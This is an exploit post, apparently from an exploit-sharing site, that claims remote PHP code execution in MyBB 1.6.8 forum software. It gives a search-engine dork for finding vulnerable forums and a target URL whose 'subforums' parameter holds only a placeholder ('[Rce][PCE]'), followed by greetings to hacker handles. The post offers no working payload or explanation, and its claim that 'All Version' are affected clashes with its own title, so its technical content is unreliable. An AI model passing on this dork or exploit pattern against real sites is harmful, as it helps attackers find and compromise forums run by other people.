facebook facebook twitter rss

Mybb 1.6.8 PHP Code Execution Vulnerability

Author: Darksnipper , Published: 15-12-2012
##################################

#

# Exploit Title : Mybb 1.6.8 PHP Code Execution Vulnerability

#

# Author : DarkSnipper
@live.com
#

# Discovered By : Darksnipper
#

# Home : http://www.cybercoders.org
#

# Software Link : http://www.mybb.com/

#

# Security Risk : High

#

# Version : All Version

#

# Tested on : GNU/Linux Ubuntu - Windows Server

#

# Dork : intext:"Powered By mybb 1.6.8"

#
##############################
# Expl0iTs :
#
# http://target.com/forumdisplay.php?fid=&subforums=[Rce][PCE]
#
################################
Greets:-Dream.Killer,Dr.Z0mbie,Soul Inj3ct0r,Error
Haxor,Sog,wg_eagle,x30-1337,Force-ex,Shadow008 and All my Mates
Regards

Like us on Facebook :